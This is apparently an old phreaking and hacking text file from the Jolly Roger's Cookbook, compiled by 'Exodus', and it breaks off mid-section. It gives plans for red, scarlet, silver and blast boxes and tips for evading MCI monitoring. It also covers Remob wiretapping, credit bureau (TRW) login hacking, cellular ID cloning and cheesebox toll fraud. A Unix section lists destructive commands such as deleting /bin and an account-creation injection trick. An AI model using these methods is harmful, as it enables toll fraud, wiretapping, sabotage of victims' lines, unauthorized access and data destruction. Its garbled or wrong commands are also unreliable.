217-359-8482/SUBLOGIC COM.
206-226-3216/SYNERGISTIC SOFTWARE
Here are a few tips on how not to get caught when using MCI or other
such services:
   1- Try not to use them for voice to voice personal calls. Try to use
      them for computer calls only. Here is why:
      MCI and those other services can't really trace the calls that
      come through the lines,they can just monitor them. They can 
      listen in on your calls and from that,they can get your name and
      other information from the conversation. They can also call
      the number you called and ask your friend some questions. If
      you call terminals and BBS'S then it is much harder to get
      information. For one thing,most sysops won't give these dudes
      that call any info at all or they will act dumb because they
      PHREAK themselves!
   2- Beware when using colored boxes! They are easy to find!!!!!
   3- Try to find a sine-wave number. Then use an MCI or other service
      to call it. You will hear a tone that goes higher and lower. If
      the tone just stops,then that code is being monitored and you
      should beware when using it.
----------------------------------------
     If you do get caught,then if you think you can,try to weasel out of it.
    I have heard many stories about people that have pleaded with the MCI
 guys and have been let off. You will get a call from a guy that has been
 monitoring you. Act nice. Act like you know it is now wrong to do this
 kind of thing.....just sound like you are sorry for what you did. (If you
 get a call,you probably will be a little sorry!)
 Otherwise,it is very dangerous!!!!!!! (Very with a capital V!)

 UpDated in '94........          -= Exodus =-


Red Box Plans                                   by the Jolly Roger

Red boxing is simulating the tones produced by public payphones when you
drop your money in. The tones are beeps of 2200 Hz + 1700 Hz
Nickle = 1 beep for 66 milliseconds.
Dime = 2 beeps, each 66 milliseconds with a 66 millisecond pause between
beeps.
Quarter = 5 beeps, each 33 milliseconds with a 33 millisecond
pause between beeps.

There are two commonly used methods being used by Phreaks to make free calls.
1. An electronic hand-held device that is made from a pair of Wien-bridge
oscillators with the timing controlled by 555 timing chips.
2. A tape recording of the tones produced by a home computer. One of
the best computers to use would be an Atari ST. It is one of the easier
computers to use because the red box tones can be produced in basic with only
about 5 statments.

                            -= Exodus =-


[__RemObS_________________________]             by the Jolly Roger

Some of you may have heard of devices called Remobs which stands
for Remote Observation System. These Devices allow supposedly
authorized telephone employees to dial into them from anywhere, and
then using an ordinary touch tone fone, tap into a customer's line
in a special receive only mode. [The mouthpiece circuit is
deactivated, allowing totally silent observation from any
fone in the world (Wire tapping without a court order is against
the law)]

[__How Remobs Work______________]
Dial the number of a Remob unit.  Bell is rumored to put them in the
555 information exchanges, or on special access trunks 
[Unreachable except via blue box].  A tone will then be heard
for approximately 2 seconds and then silence.  You must key in
(In DTMF) a 2 to 5 digit access code while holding each digit down
at least 1 second.  If the code is not entered within 5 or 6 seconds,
the Remob will release and must be dialed again.  If the code is
supposedly another tone will be heard.  A seven digit subscriber
fone number can then be entered [The Remob can only handle certain
'exchanges' which are prewired, so usually one machine cannot
monitor an entire NPA].  The Remob will then connect to the
subscribers line.  The listener will hear the low level idle tone
as long as the monitored party is on hook.  As the monitored party
dials [rotary or DTMF], the listener would hear [And Record]
the number being dialed.  Then the ENTIRE conversation, datalink,
whatever is taking place,  all without detection.  There is no
current box which can detect Remob observation, since it is being done
with the telephone equipment that makes the connection.  When the
listener is finished monitoring of that particular customer,  he keys
the last digit of the access code to disconnects him from the
monitored line and return to the tone so that he can key in another
7 digit fone #.  When the listener is totally finished with the Remob,
he keys a single 'disconnect digit' which disconnects him from the
Remob so that the device can reset and be ready for another caller.

[_History of Remobs_______________]
     Bell has kept the existance of Remobs very low key.  Only in
1974, Bell acknowledged that Remobs existed.  The device was
first made public during hearings on "Telephone Monitoring Practices
by Federal Agencies" before a subcommittee on government
operations.  House of Representatives, Ninety-Third Congress, June
1974. 
It has since been stated by Bell that the Remob devices
are used exclusively for monitoring Bell employees such as operators,
information operators, etc., to keep tabs on their performance.
[Suuureee, were stupid]

[__Possible Uses for Remobs__]
     The possible uses of Remobs are almost as endless as the uses
of self created fone line.  Imagine the ability to monitor bank lines
etc, just off the top of my head I can think of these applications:

     Data Monitoring of:
TRW
National Credit Bureau
AT&T Cosmos
Bank Institutions
Compuserve and other Networks.
     Voice Monitoring of:
Bank Institutions
Mail Order buisnesses.
Bell Telephone themselves.
Any place handling sensitive or important information.
Anyone that you may not like.

     With just one Remob, someone could get hundreds of credit cards,
find out who was on vacation, get compuserve passwords by the dozens,
disconnect peoples fones, do credit checks, find out about anything
that they may want to find out about.  Im sure you brilliant
can see the value of a telephone hobbiest and a telecommunications
enthusist getting his hands on a few choice Remobs. <Grin>

[_Caution________________________]
   If any reader should discover a Remob during his (or her) scanning
excursions,  please keep in mind the very strict federal laws
regarding wiretapping and unauthorized use of private Bell property.

                            -= Exodus =-



Scarlet Box Plans                               by the Jolly Roger

   The purpose of a Scarlet box is to create a very bad conection,
it can be used to crash a BBS or just make life miserable for those you
seek to avenge.
Materials: 2 alligator clips, 3 inch wire, or a resister
(plain wire will create greatest amount of static)
(Resister will decrease the amount of static in porportion to 
the resister you are using)

Step (1): Find the phone box at your victims house, and pop the cover off.
Step (2): Find the two prongs that the phone line you wish to box are
connected to.
Step (3): Hook your alligator clips to your (wire/resister).
Step (4): Find the lower middle prong and take off all wires connected to
it, i think this disables the ground and call waiting and shit like that.
Step (5): Now take one of the alligator clips and attach it to the upper
most prong, and take the other and attach it to the lower middle prong.
Step (6): Now put the cover back on the box and take off!!

   **       ######## **
   **       # #### #      **
            ########       /
            # #### #      /
            ########     /
                        /
                       /
                      /
                     /
                    /
                   /
                  /
               **/
               **
               **
               **
               **
               **

(**)= prongs 
 **
(/) = (wire/resister)
(##)= some phone bullshit

                                 -= Exodus =-


Silver Box Plans                                 by the Jolly Roger

Introduction:
------------
     First a bit of Phone Trivia. A standard telephone keypad has 12 buttons.
These buttons, when pushed, produce a combination of two tones. These tones
represent the row and column of the button you are pushing.
            1   1   1
            2   3   4
            0   3   7
            9   6   7
     697   (1) (2) (3)
     770   (4) (5) (6)
     851   (7) (8) (9)
     941   (*) (0) (#)
So (1) produces a tone of 697+1209, (2) produces a tone of 697+1336, etc.

Function:
--------
     What the Silver Box does is just creates another column of buttons,
with the new tone of 1633. These buttons are called A, B, C, and D.

Usefulness:
----------
     Anyone who knows anything about phreaking should know that in the
old days of phreaking, phreaks used hardware to have fun instead of other
people's Sprint and MCI codes. The most famous (and useful) was the good
ol' Blue Box. However, Ma Bell decided to fight back and now most phone systems
have protections against tone-emitting boxes. This makes boxing just
about futile in most areas of the United States (ie those areas with Crossbar
or Step-By-Step). If you live in or near a good-sized city, then your phone
system is probably up-to-date (ESS) and this box (and most others)
will be useless. However, if you live in the middle of nowhere (no offense
intended), you may find a use for this and other boxes.

Materials:
---------
     1  Foot of Blue Wire
     1  Foot of Grey Wire
     1  Foot of Brown Wire
     1  Small SPDT Switch (*)
     1  Standard Ma Bell Phone
(*) SPDT = Single Pole/Double Throw

Tools:
-----
     1  Soldering Iron
     1  Flat-Tip Screwdriver

Procedure:
---------
(1) Loosen the two screws on the bottom of the phone and take the casinf off.
(2) Loosen the screws on the side of the keypad and remove the keypad from
the mounting bracket.
(3) Remove the plastic cover from the keypad.
(4) Turn the keypad so that *0# is facing you. Turn the keypad over. You'll see
a bunch of wires, contacts, two Black Coils, etc.
(5) Look at the Coil on the left. It will have five (5) Solder Contacts
facing you. Solder the Grey Wire to the fourth Contact Pole from the left.
(6) Solder the other end of the Grey Wire to the Left Pole of the SPDT Switch.
(7) Find the Three (3) Gold-Plated Contacts on the bottom edge of the keypad.
On the Left Contact, gently seperate the two touching Connectors (they're
soldered together) and spread them apart.
(8) Solder the Brown Wire to the Contact farthest from you, and solder the
other end to the Right Pole of the SPDT Switch.
(9) Solder the Blue Wire to the Closest Contact, and the other end to the
Center Pole of the SPDT Switch.(10) Put the phone back together.

Using The Silver Box:
--------------------
     What you have just done was installed a switch that will change
the 369# column into an ABCD column. For example, to dial a 'B', switch
to Silver Box Tones and hit '6'.
     Noone is sure of the A, B, and C uses. However, in an area with an
old phone system, the 'D' button has an interesting effect. Dial Directory
Assistance and hold down 'D'. The phone will ring, and you
should get a pulsing tone. If you get a pissed-off operator, you have a
newer phone system with defenses against Silver Boxes.
At the pulsing tone, dial a 6 or 7. These are loop ends.

                                        -= Exodus =-


Bell Trashing                                   by the Jolly Roger

     The Phone Co. will go to extreams on occasions. In fact, unless
you really know what to expect from them, they will suprise the heck
out of you with their "unpublished tarriffs". Recently, a situation
was brought to my attention that up till then I had been totaly
unaware of, least to mention, had any concern about. It involved gar-
bage! The phone co. will go as far as to prosecute anyone who rumages
through their garbage and helps himself to some
     Of course, they have their reasons for this, and no doubt benefit
from such action. But, why should they be so picky about garbage? The
answer soon became clear to me: those huge metal bins are filled up
with more than waste old food and refuse... Although it is Pacific
Tele. policy to recycle paper waste products, sometimes employees do
overlook this sacred operation when sorting the garbage.  Thus
top-secret confidential Phone Co. records go to the garbage bins
instead of the paper shredders. Since it is constantly being updated
with "company memorandums, and supplied with extensive reference
material, the Phone co. must continualy dispose of the outdated
materials. Some phone companies are supplied each year with the
complete "System Practices" guide. This publication is an over 40
foot long library of reference material about everything to do with
telephones. As the new edition arrives each year, the old version of
"System Practices" must also be thrown out.
    I very quickly figured out where some local phone phreaks were
getting their material. They crawl into the garbage bins and remove
selected items that are of particular interest to them and their
fellow phreaks. One phone phreak in the Los Angeles area has salvaged
the complete 1972 edition of "Bell System Practices". It is so large
and was out of order (the binders had been removed) that it took him
over a year to sort it out and create enough shelving for it in his
garage.
     Much of this "Top Secret" information is so secret that most phone
companies have no idea what is in their files. They have their hands
full simply replacing everything each time a change in wording
requires a new revision. It seems they waste more paper than they can
read!
     It took quite a while for Hollywood Cal traffic manager to figure
out how all of the local phone phreaks constantly discovered the
switchroom test numbers
     Whenever someone wanted to use the testboard, they found the local
phone phreaks on the lines talking to all points all over the world.
It got to the point where the local garbage buffs knew more about the
office operations than the employees themselves. One phreak went so
far as to call in and tell a switchman what his next daily assignment
would be. This, however, proved to be too much. The switchman
traced the call and one phone phreak was denied the tool of his trade.
     In another rather humorous incident, a fellow phreak was rumaging
through the trash bin when he heard somone apraoching. He pressed up
against the side of the bin and silently waited for the goodies to
come. You can imagine his surprise when the garbage from the lunchroom
landed on his head. Most people find evenings best for checking out
their local telco trash piles. The only thing necessary is a
flashlight and, in the case mentioned above, possibly a rain coat. A
word of warning though, before you rush out and dive into the trash
heap. It is probably illegal, but no matter where you live, you
certainly won't get the local policeman to hold your flashlight for
you.
                              -= Exodus =-


Canadian WATS Phonebook                courtesy of the Jolly Roger

800-227-4004 ROLM Collagen Corp.
800-227-8933 ROLM Collagen Corp.
800-268-4500 Voice Mail
800-268-4501 ROLM Texaco
800-268-4505 Voice Mail
800-268-6364 National Data Credit
800-268-7800 Voice Mail
800-268-7808 Voice Mail
800-328-9632 Voice Mail
800-387-2097 Voice Mail
800-387-2098 Voice Mail
800-387-8803 ROLM Canadian Tire
800-387-8861 ROLM Canadian Tire
800-387-8862 ROLM Canadian Tire
800-387-8863 ROLM Canadian Tire
800-387-8864 ROLM Canadian Tire
800-387-8870 ROLM Halifax Life
800-387-8871 ROLM Halifax Life
800-387-9115 ASPEN Sunsweep
800-387-9116 ASPEN Sunsweep
800-387-9175 PBX [Hold Music=CHUM FM]
800-387-9218 Voice Messenger
800-387-9644 Carrier
800-426-2638 Carrier
800-524-2133 Aspen
800-663-5000 PBX/Voice Mail [Hold Music=CFMI FM]
800-663-5996 Voice Mail (5 rings)
800-847-6181 Voice Mail

NOTES:  Each and every one of these numbers is available to the 604
(British Columbia) Area Code.  Most are available Canada Wide and some 
are located in the United States.  Numbers designated ROLM have been
identified as being connected to a ROLM Phonemail system. 
Numbers designated ASPEN are connected to an ASPEN voice message system.
Numbers designated VOICE MAIL have not been identified as to equipment
in use on that line.  Numbers designated carrier are answered by a modem
or data set.  
Most Voice Message systems, and ALL Rolms, sound like an answering machine.
Press 0 during the recording when in a rolm, * or # or other DTMF in other
systems, and be propelled into another world...

Brought to you in the Cookbook IV by Exodus!!!!!!!!!!!!!!!!



Hacking TRW                                      by the Jolly Roger

    When you call TRW, the dial up will identify itself with the message "TRW".
It will then wait for you to type the appropiate answer back (such as CTRL-G)
 Once This has been done, the system will say "CIRCUIT BUILDING IN PROGRESS"
Along with a few numbers. After this, it clears the screen
(CTRL  L) followed by a CTRL-Q. After the system sends the CTRL-Q, It is
ready for the request. You first type the 4 character identifyer for the
geographical area of the account..

(For Example) TCA1 - for certain Calif. & Vicinity subscribers. 
TCA2 - A second CALF. TRW System. 
TNJ1 - Their NJ Database. 
TGA1 - Their Georgia Database.

The user then types A <CR> and then on the next line, he must type
his 3 char. Option. Most Requests use the RTS option.
OPX, RTX, and a few others exist. (NOTE) TRW will accept an A, C,
or S as the 'X' in the options above.) Then finally, the user types his 7
digit subscriber code. He appends his 3-4 character password after it.  It
seems that if you manage to get hold of a TRW Printout (Trashing at Sears,
Saks, ETC. or from getting your credit printout from them) Their subscriber
code will be on it leaving only a 3-4 character p/w up to you.

For Example,
(Call the DialUp)
TRW  System Types, ST) CTRL-G 
(You type,YT) Circuit building in progress 1234 
(ST) CTRL-L CRTL-Q (TCA1 CYT) BTS 3000000AAA
<CR><CRTL-S> (YT]
Note: This sytem is in Half Duplex, Even Parity, 7 Bits per word and
2 Stop Bits.

CAUTION: It is a very stressed rumor that after typing in the TRW
password Three (3) times.. It sets an Automatic Number Identification on your
ass, so be careful. And  forget who told you how to do this..

                                     -= Exodus =-
 

Hacking Vax's & Unix                             by the Jolly Roger

    Unix is a trademark of At&t (and you know what that means)

_______________________________________
In this article, we discuss the unix system that runs on
the various vax systems.  If you are on another unix-type system, some
commands may differ, but since it is licenced to bell, they can't make many
changes.
_______________________________________
Hacking onto a unix system is very difficult, and in this case, we advise
having an inside source, if possible. The reason it is difficult to hack a
vax is this:  Many vax, after you get a carrier from them, respond=>
Login:
They give you no chance to see what the login name format is.  Most commonly
used are single words, under 8 digits, usually the person's name.  There is
a way around this:  Most vax have an acct. called 'suggest' for people to
use to make a suggestion to the system root terminal.  This is usually watched
by the system operator, but at late he is probably at home sleeping or
screwing someone's brains out.  So we can write a program to send at the
vax this type of a message:
A screen freeze (Cntrl-s), screen clear (system dependant), about 255
garbage characters, and then a command to create a login acct., after which
you clear the screen again, then unfreeze the terminal.  What this does:
When the terminal is frozen, it keeps a buffer of what is sent.  well, the
buffer is about 127 characters long. so you overflow it with trash, and then
you send a command line to create an acct. (System dependant).  after this
you clear the buffer and screen again, then unfreeze the terminal.  This is
a bad way to do it, and it is much nicer if you just send a command to
the terminal to shut the system down, or whatever you are after...
There is always, *Always* an acct. called root, the most powerful acct.
to be on, since it has all of the system files on it.  If you hack your
way onto this one, then everything is easy from here on...
On the unix system, the abort key is the Cntrl-d key.  watch how many times
you hit this, since it is also a way to log off the system!
A little about unix architechture: The root directory, called root, is
where the system resides.  After this come a few 'sub' root directories,
usually to group things (stats here, priv stuff here, the user log here...).
Under this comes the superuser (the operator of the system), and then
finally the normal users.  In the unix 'Shell' everything is treated the same.
By this we mean:  You can access a program the same way you access a user
directory, and so on.  The way the unix system was written, everything,
users included, are just programs belonging to the root directory.  Those
of you who hacked onto the root, smile, since you can screw everything...
the main level (exec level) prompt on the unix system is the $, and if you
are on the root, you have a # (superuser prompt).
Ok, a few basics for the system... To see where you are, and what paths
are active in regards to your user account, then type
=> pwd
This shows your acct. seperated by a slash with another pathname (acct.),
possibly many times. To connect through to another path,
or many paths, you would type:
You=> path1/path2/path3
and then you are connected all the way from path1 to path3.  You can
run the programs on all the paths you are connected to.  If it does
not allow you to connect to a path, then you have insufficient privs, or
the path is closed and archived onto tape.  You can run programs this way
also:
you=> path1/path2/path3/program-name
Unix treats everything as a program, and thus there a few commands to
learn...
To see what you have access to in the end path, type=>
ls
for list.  this show the programs you can run.  You can connect to
the root directory and run it's programs with=>
/root
By the way, most unix systems have their log file on the root, so you
can set up a watch on the file, waiting for people to log in and snatch their
password as it passes thru the file. To connect to a directory, use the
command:
=> cd pathname  This allows you to do what you want
with that directory.  You may be asked for a password, but this is a good
ay of finding other user names to hack onto.
The wildcard character in unix, if you want to search down a path for
a game or such, is the *.
=> ls /*
Should show you what you can access. The file types are the same as they
are on a dec, so refer to that section when examining file.  To see what is
in a file, use the
=> pr
filename command, for print file.
We advise playing with pathnames to get the hang of the concept.  There
is on-line help available on most systems with a 'help' or a '?'.
We advise you look thru the help files and pay attention to anything
they give you on pathnames, or the commands for the system.
You can, as a user, create or destroy directories on the tree beneath you.
This means that root can kill everything but root, and you can kill any
that are below you.  These are the
=> mkdir pathname
=> rmdir pathname
commands.
Once again, you are not alone on the system... type=> 
who
to see what other users are logged in to the system at the time.  If you
want to talk to them=>
write username 
Will allow you to chat at the same time, without having to worry
about the parser.  To send mail to a user, say
=> mail
And enter the mail sub-system. To send a message to all the users
on the system, say
=> wall
Which stands for 'write all'. By the way, on a few systems,
all you have to do is hit the <return> key to end the message,
but on others you must hit the cntrl-d key.
To send a single message to a user, say
=> write username
this is very handy again!  If you send the sequence of characters discussed
at the very beginning of this article, you can have the super-user terminal do
tricks for you again. 

Privs:
If you want superuser privs, you can either log in as root, or edit your
acct. so it can say
=> su
this now gives you the # prompt, and allows you to completely by-pass the
protection.  The wonderful security conscious developers at bell made it
very difficult to do much without privs, but once you have them, there
is absolutely nothing stopping you from doing anything you want to.
To bring down a unix system:
=> chdir /bin
=> rm *
this wipes out the pathname bin, where all the system maintenance files are.
Or try:
=> r -r
This recursively removes everything from the system except the remove
command itself.
Or try:
=> kill -1,1
=> sync
This wipes out the system devices from operation.
When you are finally sick and tired from hacking on the vax systems, just
hit your cntrl-d and repeat key, and you will eventually be logged out.
_______________________________________
The reason this file seems to be very sketchy is the fact that bell has 7
licenced versions of unix out in the public domain, and these commands are
those common to all of them.  I recommend you hack onto the root or
bin directory, since they have the highest levels of privs, and there
is really not much you can do (except develop software) without them.
_______________________________________


Verification Circuits                  courtesy of the Jolly Roger
      (originally an Apple ][ file so forgive the upper case!)

1. ONE BUSY VERIFICATION CONFERENCE CIRCUIT IS ALWAYS PROVIDED.THE CIRCUIT IS A
THREE-WAY CONFERENCE BRIDGE THAT ENABLES AN OPERERATOR TO  VERIFY THE BUSY/IDLE
CONDITION OF A SUBSCRIBER LINE.UPON REQUEST OF A PARTY ATTEMPTING TO REACH A
SPECIFIED DIRECTORY NUMBER, THE OPERATOR DIALS THE CALLED LINE NUMBER TO
DETERMINE IF THE LINE IS IN USE,IF THE RECEIVER IS OFF THE HOOK,OR IF THE LINE
IS IN LOCKOUT DUE TO A FAULT CONDITKON.THE OPERATOR THEN RETURNS TO THE PARTY
TRYING TO REACH THE DIRE CTORY NUMBER AND STATES THE CONDITION OF THE
LINE.LINES WITH DATA SECURITY CAN NOT BE ACCESSED FOR BUSY VERIFICATION WHEN
THE LINE IS IN USE.(REFER ALSO TO DATA SECURITY)
2. THREE PORTS ARE ASSIGNED TO EACH BUSY VERIFICATION CONFERENCE CIRCUIT.ONE
PORT IS FOR OPERATOR ACCESS AND TWO PORTS ARE USED TO SPLIT AN EXISTING
CONNECTION.TO VERKFY THE BUSY/IDLE CONDITION OF A LINE,THE OPERATOR
ESTABLISHED A CONNECTION TO THE OPERATOR ACCESS PORT AND DIALS THE DIRECTORY
NUMBER OF THE LINE TO BE VERIFIED.IF THE LINE IS IN USE,THE EXISTING
CONNECTION IS BROKEN AND IMMEDIATLY RE-ESTABLISHED THROUGH THE
OTHER TWO PORTS OF THE BUSY VERIFICATION CIRCUIT WITHOUT INTERRUPTION.
BUSY VERIFICATION CIRCUIT IS CONTROLLED BY ACCESS CODE. A DEDICATED TRUNK CAN
BE USED BUT IS NOT NECESSARY.
3. THE BUSY VREIFICATION CIRCUIT ALSO CAN BE USED FOR TEST VERIFY FROM THE WIRE
CHIEFS TEST PANEL.
   B. ADDITIONAL BUSY VERIFICATION CONFERENCE CIRCUITS (002749)
O.K. THERE IT IS-RIGHT OUT OF AN ESS MANUAL WORD FOR WORD! (AND IM GETTING 25
LINEAR FEET OF ESS MANUALS!!! NOT COUNTING THE STACK RECEIVED SO FAR!

            Brought to you in the Cookbook IV by Exodus!!!!

White Box Plans                                 by the Jolly Roger

Introduction:
------------
     The White Box is simply a portable Touch-Tone keypad. For more
information on Touch-Tone, see my Silver Box Plans.
Materials:
---------
  1 Touch-Tone Keypad
  1 Miniature 1000 to 8 Ohm Transformer
    (Radio Shack # 273-1380)
  1 Standard 8 Ohm Speaker
  2 9V Batteries
  2 9V Battery Clips

Procedure:
---------
(1) Connect the Red Wire from the Transformer to either terminal on the
Speaker.
(2) Connect the White Wire from the Transformer to the other terminal on
the Speaker.
(3) Connect the Red Wire from one Battery Clip to the Black Wire from the other
Battery Clip.
(4) Connect the Red Wire from the second Battery Clip to the Green Wire
from the Keypad.
(5) Connect the Blue Wire from the Keypad to the Orange/Black Wire from
the Keypad.
(6) Connect the Black Wire from the first Battery Clip to the two above
wires (Blue and Black/Orange).
(7) Connect the Black Wire from the Keypad to the Blue Wire from the
Transformer.
(8) Connect the Red/Green Wire from the Keypad to the Green Wire from the
Transformer.
(9) Make sure the Black Wire from the Transformer and the remaining wires
from the Keypad are free.
(10) Hook up the Batteries.

Optional:
--------
(1) Put it all in a case.
(2) Add a Silver Box to it.

Use:
---
Just use it like a normal keypad, except put the speaker next to the
receiver of the phone you're using.

                              ---------Exodus--------


The BLAST Box                                 Courtesy of the Jolly Roger

Ever want to really make yourself be heard? Ever talk to someone on the phone
who just doesn't shut up? Or just call the operator and pop her eardrum? Well,
up until recently it has been impossible for you to do these things. That is,
unless of course you've got a blast box. All a blast box is, is a really cheap
amplifier, (around 5 watts or so) connected in place of the microphone on your
telephone. It works best on model 500 AT&T Phones, and if constructed small
enough, can be placed inside the phone.

Construction:

Construction is not really important. Well it is, but since I'm letting you make
your own amp, I really don't have to include this.

Usage:

Once you've built your blast box, simply connect a microphone (or use the
microphone from the phone) to the input of the amplifier, and presto. There it
is. Now, believe it or not, this device actually works. (At least on crossbar.)
It seems that Illinois bell switching systems allow quite alot of current to
pass right through the switching office, and out to whoever you're calling. When
you talk in the phone, it comes out of the other phone (again it works best if
the phone that you're calling has the standard western electric earpiece)
incredibly loud. This device is especially good for PBS Subscription drives.
Have "Phun", and don't get caught!

---- Compiled by: Exodus------               Dealing with the Rate & Route Operator         


        It seems that fewer and fewer people have blue boxes
these days, and that is really too bad.  Blue boxes, while not
all that great for making free calls (since the TPC can tell when
the call was made, as well as where it was too and from), are
really a lot of fun to play with.  Short of becoming a real live
TSPS operator, they are about the only way you can really play
with the network.

        For the few of you with blue boxes, here are some phrases
which may make life easier when dealing with the rate & route
(R&R) operators.  To get the R&R op, you send a KP + 141 + ST.
In some areas you may need to put another NPA before the 141
(i.e., KP + 213 + 141 + ST), if you have no local R&R ops.

        The R&R operator has a myriad of information, and all it
takes to get this data is mumbling cryptic phrases.  There are
basically four special phrases to give the R&R ops.  They are
NUMBERS route, DIRECTORY route, OPERATOR route, and PLACE NAME.

        To get an R&R an area code for a city, one can call the
R&R operator and ask for the numbers route.  For example, to find
the area code for Carson City, Nevada, we'd ask the R&R op for
"Carson City, Nevada, numbers route, please." and get the answer,
"Right... 702 plus." meaning that 702 plus 7 digits gets us
there.
        Sometimes directory assistance isn't just NPA + 131. The
way to get these routings is to call R&R and ask for "Anaheim,
California, directory route, please." Of course, she'd tell us it
was 714 plus, which means 714 + 131 gets us the D.A. op there.
This is sort of pointless example, but I couldn't come up with a
better one on short notice.

        Let's say you wanted to find out how to get to the inward
operator for Sacremento, California.  The first six digits of a
number in that city will be required (the NPA and an NXX).  For
example, let us use 916 756. We would call R&R, and when the
operator answered, say, "916 756, operator route, please." The
operator would say, "916 plus 001 plus."  This means that 916
+ 001 + 121 will get you the inward operator for Sacramento. Do
you know the city which corresponds to 503 640?  The R&R operator
does, and will tell you that it is Hillsboro, Oregon, if you
sweetly ask for "Place name, 503 640, please."

        For example, let's say you need the directory route for
Sveg, Sweden. Simply call R&R, and ask for, "International,
Baden, Switzerland. TSPS directory route, please."  In response
to this, you'd get, "Right... Directory to Sveg, Sweden.  Country
code 46 plus 1170."  So you'd route yourself to an
international sender, and send 46 + 1170 to get the D.A. operator
in Sweden.

        Inward operator routings to various countries are
obtained the same way "International, London, England, TSPS
inward route, please." and get "Country code 44 plus 121."
Therefore, 44 plus 121 gets you inward for London.
        Inwards can get you language assitance if you don't speak
the language. Tell the foreign inward, "United Staes calling.
Language assitance in completing a call to (called party) at
(called number)."
        R&R operators are people are people too, y'know.  So
always be polite, make sure use of 'em, and dial with care.


-----------ExodusCellular Phreaking                         courtesy of The  Jolly Roger

     The cellular/mobile phone system is one that is perfectly set up to be
exploited by phreaks with the proper knowledge and equipment.  Thanks to
deregulation, the regional BOC's (Bell Operating Companies) are scattered
and do not communicate much with each other.  Phreaks can take advantage of
this by pretending to be mobile phone customers whose "home base" is a city
served by a different BOC, known as a "roamer".  Since it is impractical
for each BOC to keep track of the customers of all the other BOC's, they
will usually allow the customer to make the calls he wishes, often with a
surcharge of some sort.

The bill is then forwarded to the roamer's home BOC for collection.
However, it is fairly simple (with the correct tools) to create a bogus ID
number for your mobile phone, and pretend to be a roamer from some other
city and state, that's "just visiting".  When your BOC tries to collect for
the calls from your alleged "home BOC", they will discover you are not a
real customer; but by then, you can create an entirely new electronic
identity, and use that instead. 
    How does the cellular system know who is calling, and where they are?
When a mobile phone enters a cell's area of transmission, it transmits its
phone number and its 8 digit ID number to that cell, who will keep track of
it until it gets far enough away that the sound quality is sufficiently
diminished, and then the phone is "handed off" to the cell that the customer
has walked or driven into.  This process continues as long as the phone has
power and is turned on.  If the phone is turned off (or the car is), someone
attempting to call the mobile phone will receive a recording along the
lines of "The mobile phone customer you have dialed has left the vehicle
or driven out of the service area."   When a call is made to a mobile phone,
the switching equipment will check to see if the mobile phone being called is
"logged in", so to speak, or present in one of the cells.  If it is, the
call will then act (to the speaking parties) just like a normal call - the
caller may hear a busy tone, the phone may just ring, or the call may be
answered. 
    How does the switching equipment know whether or not a particular
phone is authorized to use the network?  Many times, it doesn't.  When a
dealer installs a mobile phone, he gives the phone's ID number (an 8 digit
hexadecimal number) to the local BOC, as well as the phone number the BOC
assigned to the customer.  Thereafter, whenever a phone is present in one
of the cells, the two numbers are checked - they should be registered to
the same person.  If they don't match, the telco knows that an attempted
fraud is taking place (or at best, some transmission error) and will not
allow calls to be placed or received at that phone.  However, it is
impractical (especially given the present state of deregulation) for the
telco to have records of every cellular customer of every BOC.  Therefore,
if you're going to create a fake ID/phone number combination, it will need
to be "based" in an area that has a cellular system (obviously), has a
different BOC than your local area does, and has some sort of a "roamer"
agreement with your local BOC.

   How can one "phreak" a cellular phone?  There are three general areas
when phreaking cellular phones; using one you found in an unlocked car
(or an unattended walk-about model), modifying your own chip set to look
like a different phone, or recording the phone number/ID number combinations
sent by other local cellular phones, and using those as your own.  Most
cellular phones include a crude "password" system to keep unauthorized
users from using the phone - however, dealers often set the password 
(usually a 3 to 5 digit code) to the last four digits of the customer's
mobile phone number.  If you can find that somewhere on the phone, you're
in luck.  If not, it shouldn't be TOO hard to hack, since most people
aren't smart enough to use something besides "1111", "1234", or whatever.
If you want to modify the chip set in a cellular phone you bought
(or stole), there are two chips (of course, this depends on the model and
manufacturer, yours may be different) that will need to be changed - one
installed at the manufacturer (often epoxied in) with the phone's ID
number, and one installed by the dealer with the phone number, and possible
the security code.  To do this, you'll obviously need an EPROM burner
as well as the same sort of chips used in the phone (or a friendly and
unscrupulous dealer!).  As to recording the numbers of other mobile phone
customers and using them; as far as I know, this is just theory... but it
seems quite possible, if you've got the equipment to record and decode it.
The cellular system would probably freak out if two phones (with valid
ID/phone number combinations) were both present in the network at once,
but it remains to be seen what will happen.

-----Compiled by: Exodus-------Cheesebox Plans                         Courtesy of The Jolly Roger

     A Cheesebox (named for the type of box the first one was
found in) is a type of box which will, in effect, make your
telephone a Pay-Phone.....This is a simple,modernized, and easy
way of doing it....

      Inside Info:These were first used by bookies many years ago
as a way of making calls to people without being called by the
cops or having their numbers traced and/or tapped......

     How To Make A Modern Cheese Box

     Ingredients:
     ------------

     1 Call Forwarding service on the line

     1 Set of Red Box Tones

     The number to your prefix's Intercept operator (do some scanning
     for this one)

     How To:
     -------

       After you find the number to the intercept operator in
your prefix, use your call-forwarding and forward all calls to
her...this will make your phone stay off the hook(actually, now
it waits for a quarter to be dropped in)...you now have a cheese
box... In Order To Call Out On This Line:You must use your Red
Box tones and generate the quarter dropping in...then,you can
make phone calls to people...as far as I know, this is fairly
safe, and they do not check much...Although I am not sure, I
think you can even make credit-card calls from a cheesebox
phone and not get traced...

-- Exodus --


HOW TO START YOUR OWN CONFERENCES!      Brought to you by Exodus

BLACK BART SHOWED HOW TO START A CONFERENCE CALL THRU AN 800 EXCHANGE, AND I
WILL NOW EXPLAIN HOW TO START A CONFERENCE CALL IN A MORE ORTHODOX FASHIO, THE
2600 HZ. TONE.

FIRSTLY, THE FONE COMPANY HAS WHAT IS CALLED SWITCHING SYSTEMS.  THERE ARE SE
VERAL TYPES, BUT THE ONE WE WILL CONCERN OURSELVES WITH, IS ESS (ELECTRONIC
SWITCHING SYSTEM).  IF YOUR AREA IS ZONED FOR ESS, DO NOT START A CONFERENCE
CALL VIA THE 2600 HZ. TONE, OR BELL SECURITY WILL NAIL YOUR ASS!  TO FND OUT IF
YOU ARE UNDER ESS, CALL YOUR LOCAL BUSINESS OFFICE, AND ASK THEM IF YOU CAN GET
CALL WAITING/FORWARDING, AND IF YOU CAN, THAT MEANS THAT YOU ARE IN ESS COUNTRY
, AND CONFERENCE CALLING IS VERY, VERY DANGEROUS!!! NOW, IF YOU ARE NOT IN ESS,
YOU WILL NEED THE FOLLOWING EQUIPMENT:

  AN APPLE CAT II MODEM
  A COPY OF TSPS 2 OR CAT'S MEOW
  A TOUCH TONE FONE LINE
  AND A TOUCH TONE FONE. (TRUE TONE)

NOW, WITH TSPS 2, DO THE FOLLOWING:

